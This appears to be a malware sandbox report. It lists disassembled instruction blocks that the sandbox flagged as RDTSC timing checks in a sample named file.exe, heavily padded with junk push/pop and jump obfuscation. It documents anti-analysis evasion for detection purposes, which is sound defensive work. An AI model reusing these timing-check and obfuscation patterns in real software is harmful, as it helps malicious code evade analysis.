              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AC43A second address: 8AC463 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F92851B8956h 0x00000008 jnl 00007F92851B8946h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push edi 0x00000017 pop edi 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AC463 second address: 8AC469 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AC469 second address: 8AC46F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E50306 second address: 4E503E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edi 0x00000005 mov bx, CFB6h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esp 0x0000000d pushad 0x0000000e movzx eax, dx 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F9284AFDC8Bh 0x00000018 or cl, 0000003Eh 0x0000001b jmp 00007F9284AFDC99h 0x00000020 popfd 0x00000021 call 00007F9284AFDC90h 0x00000026 pop ecx 0x00000027 popad 0x00000028 popad 0x00000029 mov dword ptr [esp], ebp 0x0000002c pushad 0x0000002d pushfd 0x0000002e jmp 00007F9284AFDC97h 0x00000033 or al, FFFFFFFEh 0x00000036 jmp 00007F9284AFDC99h 0x0000003b popfd 0x0000003c pushfd 0x0000003d jmp 00007F9284AFDC90h 0x00000042 and eax, 34C821F8h 0x00000048 jmp 00007F9284AFDC8Bh 0x0000004d popfd 0x0000004e popad 0x0000004f mov ebp, esp 0x00000051 pushad 0x00000052 push ecx 0x00000053 pushfd 0x00000054 jmp 00007F9284AFDC8Bh 0x00000059 jmp 00007F9284AFDC93h 0x0000005e popfd 0x0000005f pop eax 0x00000060 mov ch, bh 0x00000062 popad 0x00000063 mov edx, dword ptr [ebp+0Ch] 0x00000066 pushad 0x00000067 mov esi, 5A42365Dh 0x0000006c push eax 0x0000006d push edx 0x0000006e mov bl, al 0x00000070 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E50407 second address: 4E50416 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F92851B894Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E803E0 second address: 4E803FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9284AFDC91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E803FD second address: 4E80401 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80401 second address: 4E80407 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80407 second address: 4E80424 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F92851B8952h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80424 second address: 4E8042A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E8042A second address: 4E80439 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F92851B894Bh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80439 second address: 4E8043D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E8043D second address: 4E80483 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F92851B8954h 0x0000000e xchg eax, ecx 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F92851B894Eh 0x00000016 adc esi, 0F0CE0F8h 0x0000001c jmp 00007F92851B894Bh 0x00000021 popfd 0x00000022 push eax 0x00000023 push edx 0x00000024 mov si, 55C5h 0x00000028 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80483 second address: 4E804D6 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F9284AFDC92h 0x00000008 xor esi, 0FCC3B58h 0x0000000e jmp 00007F9284AFDC8Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 xchg eax, esi 0x00000018 jmp 00007F9284AFDC96h 0x0000001d push eax 0x0000001e jmp 00007F9284AFDC8Bh 0x00000023 xchg eax, esi 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E804D6 second address: 4E80538 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F92851B8950h 0x00000008 adc cx, 0018h 0x0000000d jmp 00007F92851B894Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push esi 0x00000016 pushfd 0x00000017 jmp 00007F92851B894Fh 0x0000001c or esi, 65E424DEh 0x00000022 jmp 00007F92851B8959h 0x00000027 popfd 0x00000028 pop ecx 0x00000029 popad 0x0000002a lea eax, dword ptr [ebp-04h] 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80538 second address: 4E8053C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E8053C second address: 4E80554 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F92851B8954h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80554 second address: 4E8058C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9284AFDC8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b mov bx, cx 0x0000000e mov ecx, 57A44A77h 0x00000013 popad 0x00000014 push eax 0x00000015 pushad 0x00000016 movsx edx, cx 0x00000019 mov dx, ax 0x0000001c popad 0x0000001d nop 0x0000001e pushad 0x0000001f jmp 00007F9284AFDC8Ch 0x00000024 push eax 0x00000025 push edx 0x00000026 mov eax, 62285057h 0x0000002b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E8058C second address: 4E805A2 instructions: 0x00000000 rdtsc 0x00000002 mov di, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push dword ptr [ebp+08h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov ecx, edx 0x00000010 mov ebx, 52D55F12h 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E805A2 second address: 4E805A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E805A8 second address: 4E805AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E805C0 second address: 4E805C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E805C4 second address: 4E805CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E805CA second address: 4E805D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E805D0 second address: 4E805D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E805D4 second address: 4E8061A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9284AFDC8Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b cmp dword ptr [ebp-04h], 00000000h 0x0000000f jmp 00007F9284AFDC90h 0x00000014 mov esi, eax 0x00000016 jmp 00007F9284AFDC90h 0x0000001b je 00007F9284AFDCC6h 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 mov bx, 86D0h 0x00000028 popad 0x00000029 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80697 second address: 4E70080 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F92851B894Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a pushad 0x0000000b mov bx, ax 0x0000000e pushad 0x0000000f mov si, 6A05h 0x00000013 mov ah, A1h 0x00000015 popad 0x00000016 popad 0x00000017 retn 0004h 0x0000001a nop 0x0000001b cmp eax, 00000000h 0x0000001e setne al 0x00000021 xor ebx, ebx 0x00000023 test al, 01h 0x00000025 jne 00007F92851B8947h 0x00000027 xor eax, eax 0x00000029 sub esp, 08h 0x0000002c mov dword ptr [esp], 00000000h 0x00000033 mov dword ptr [esp+04h], 00000000h 0x0000003b call 00007F9289951D83h 0x00000040 mov edi, edi 0x00000042 pushad 0x00000043 pushfd 0x00000044 jmp 00007F92851B894Ch 0x00000049 jmp 00007F92851B8955h 0x0000004e popfd 0x0000004f movzx esi, bx 0x00000052 popad 0x00000053 push edx 0x00000054 pushad 0x00000055 pushfd 0x00000056 jmp 00007F92851B8956h 0x0000005b adc eax, 5281F708h 0x00000061 jmp 00007F92851B894Bh 0x00000066 popfd 0x00000067 call 00007F92851B8958h 0x0000006c pushad 0x0000006d popad 0x0000006e pop esi 0x0000006f popad 0x00000070 mov dword ptr [esp], ebp 0x00000073 push eax 0x00000074 push edx 0x00000075 jmp 00007F92851B894Ah 0x0000007a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70080 second address: 4E70086 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70086 second address: 4E7008A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E7008A second address: 4E7008E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E7008E second address: 4E7011A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F92851B8959h 0x0000000f push FFFFFFFEh 0x00000011 jmp 00007F92851B894Eh 0x00000016 push 326049FDh 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F92851B8957h 0x00000022 sbb ah, 0000006Eh 0x00000025 jmp 00007F92851B8959h 0x0000002a popfd 0x0000002b pushad 0x0000002c mov eax, 0F7D91CDh 0x00000031 push esi 0x00000032 pop ebx 0x00000033 popad 0x00000034 popad 0x00000035 add dword ptr [esp], 443A544Bh 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007F92851B894Bh 0x00000043 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E7011A second address: 4E70120 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70120 second address: 4E70124 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70124 second address: 4E701AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9284AFDC8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b call 00007F9284AFDC89h 0x00000010 pushad 0x00000011 jmp 00007F9284AFDC94h 0x00000016 pushfd 0x00000017 jmp 00007F9284AFDC92h 0x0000001c or esi, 5DD1D7A8h 0x00000022 jmp 00007F9284AFDC8Bh 0x00000027 popfd 0x00000028 popad 0x00000029 push eax 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007F9284AFDC8Fh 0x00000031 jmp 00007F9284AFDC93h 0x00000036 popfd 0x00000037 mov edx, esi 0x00000039 popad 0x0000003a mov eax, dword ptr [esp+04h] 0x0000003e pushad 0x0000003f pushad 0x00000040 mov di, 7CE4h 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E701AE second address: 4E701DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 call 00007F92851B8956h 0x0000000b pop ecx 0x0000000c pop edi 0x0000000d popad 0x0000000e mov eax, dword ptr [eax] 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F92851B894Ch 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E701DD second address: 4E7021E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9284AFDC8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d pushad 0x0000000e mov eax, ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushfd 0x00000013 jmp 00007F9284AFDC91h 0x00000018 sub cx, 5FE6h 0x0000001d jmp 00007F9284AFDC91h 0x00000022 popfd 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E7021E second address: 4E70249 instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 pop eax 0x00000009 jmp 00007F92851B8953h 0x0000000e mov eax, dword ptr fs:[00000000h] 0x00000014 pushad 0x00000015 popad 0x00000016 push ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70249 second address: 4E7024F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E7024F second address: 4E70255 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70255 second address: 4E70259 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70259 second address: 4E702A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F92851B8958h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e jmp 00007F92851B8950h 0x00000013 sub esp, 18h 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F92851B8957h 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E702A6 second address: 4E7036C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9284AFDC99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F9284AFDC8Ch 0x00000011 and ax, 5838h 0x00000016 jmp 00007F9284AFDC8Bh 0x0000001b popfd 0x0000001c jmp 00007F9284AFDC98h 0x00000021 popad 0x00000022 push eax 0x00000023 pushad 0x00000024 push edi 0x00000025 push esi 0x00000026 pop edi 0x00000027 pop esi 0x00000028 pushfd 0x00000029 jmp 00007F9284AFDC99h 0x0000002e jmp 00007F9284AFDC8Bh 0x00000033 popfd 0x00000034 popad 0x00000035 xchg eax, ebx 0x00000036 pushad 0x00000037 pushfd 0x00000038 jmp 00007F9284AFDC94h 0x0000003d xor ecx, 6E895758h 0x00000043 jmp 00007F9284AFDC8Bh 0x00000048 popfd 0x00000049 call 00007F9284AFDC98h 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E7036C second address: 4E703CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push ecx 0x00000007 pushad 0x00000008 call 00007F92851B894Ah 0x0000000d mov cx, CB01h 0x00000011 pop eax 0x00000012 pushad 0x00000013 mov edi, 314BAD00h 0x00000018 mov eax, edx 0x0000001a popad 0x0000001b popad 0x0000001c mov dword ptr [esp], esi 0x0000001f jmp 00007F92851B894Bh 0x00000024 xchg eax, edi 0x00000025 pushad 0x00000026 mov edx, ecx 0x00000028 pushfd 0x00000029 jmp 00007F92851B8950h 0x0000002e sub si, 8678h 0x00000033 jmp 00007F92851B894Bh 0x00000038 popfd 0x00000039 popad 0x0000003a push eax 0x0000003b pushad 0x0000003c movsx edx, ax 0x0000003f popad 0x00000040 xchg eax, edi 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E703CF second address: 4E703D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E703D3 second address: 4E703D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E703D7 second address: 4E703DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70500 second address: 4E70504 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70504 second address: 4E7050A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E7050A second address: 4E7050F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E7050F second address: 4E70552 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bh, 85h 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [ebp-18h], esp 0x0000000c jmp 00007F9284AFDC92h 0x00000011 mov eax, dword ptr fs:[00000018h] 0x00000017 jmp 00007F9284AFDC90h 0x0000001c mov ecx, dword ptr [eax+00000FDCh] 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 push edx 0x00000026 pop esi 0x00000027 movsx ebx, si 0x0000002a popad 0x0000002b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70552 second address: 4E70558 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70558 second address: 4E7055C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E7055C second address: 4E7056C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test ecx, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E7056C second address: 4E70570 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70570 second address: 4E70574 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70574 second address: 4E7057A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E7057A second address: 4E70629 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 call 00007F92851B8959h 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jns 00007F92851B89A0h 0x00000014 pushad 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F92851B8953h 0x0000001c and cl, 0000006Eh 0x0000001f jmp 00007F92851B8959h 0x00000024 popfd 0x00000025 call 00007F92851B8950h 0x0000002a pop esi 0x0000002b popad 0x0000002c mov edx, 363603A6h 0x00000031 popad 0x00000032 add eax, ecx 0x00000034 jmp 00007F92851B894Dh 0x00000039 mov ecx, dword ptr [ebp+08h] 0x0000003c pushad 0x0000003d pushfd 0x0000003e jmp 00007F92851B894Ch 0x00000043 and cx, 6148h 0x00000048 jmp 00007F92851B894Bh 0x0000004d popfd 0x0000004e movzx esi, di 0x00000051 popad 0x00000052 test ecx, ecx 0x00000054 pushad 0x00000055 push eax 0x00000056 push edx 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70629 second address: 4E7062D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60348 second address: 4E60403 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F92851B8959h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F92851B894Eh 0x0000000f push eax 0x00000010 pushad 0x00000011 call 00007F92851B8951h 0x00000016 jmp 00007F92851B8950h 0x0000001b pop ecx 0x0000001c pushfd 0x0000001d jmp 00007F92851B894Bh 0x00000022 or ax, 2BEEh 0x00000027 jmp 00007F92851B8959h 0x0000002c popfd 0x0000002d popad 0x0000002e xchg eax, ebp 0x0000002f pushad 0x00000030 call 00007F92851B894Ch 0x00000035 call 00007F92851B8952h 0x0000003a pop esi 0x0000003b pop edi 0x0000003c popad 0x0000003d mov ebp, esp 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007F92851B8958h 0x00000046 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60403 second address: 4E6043E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F9284AFDC91h 0x00000009 adc eax, 206E66E6h 0x0000000f jmp 00007F9284AFDC91h 0x00000014 popfd 0x00000015 mov edx, eax 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a sub esp, 2Ch 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E6043E second address: 4E60442 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60442 second address: 4E60448 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60448 second address: 4E60470 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F92851B894Ah 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebx 0x0000000e pushad 0x0000000f mov dh, ah 0x00000011 mov cx, di 0x00000014 popad 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F92851B894Bh 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60470 second address: 4E604B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9284AFDC99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F9284AFDC8Eh 0x0000000f xchg eax, edi 0x00000010 pushad 0x00000011 mov ebx, eax 0x00000013 mov ebx, eax 0x00000015 popad 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F9284AFDC92h 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E604B8 second address: 4E604CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F92851B894Eh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E604CA second address: 4E604E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9284AFDC8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, edi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov edx, 1D803C76h 0x00000014 movsx ebx, ax 0x00000017 popad 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E6051D second address: 4E60583 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dx, 525Eh 0x0000000a popad 0x0000000b mov ebx, 00000000h 0x00000010 jmp 00007F92851B8952h 0x00000015 sub edi, edi 0x00000017 jmp 00007F92851B8951h 0x0000001c inc ebx 0x0000001d pushad 0x0000001e mov ecx, 63660AB3h 0x00000023 push eax 0x00000024 push edx 0x00000025 pushfd 0x00000026 jmp 00007F92851B8956h 0x0000002b sbb ax, 90B8h 0x00000030 jmp 00007F92851B894Bh 0x00000035 popfd 0x00000036 rdtsc
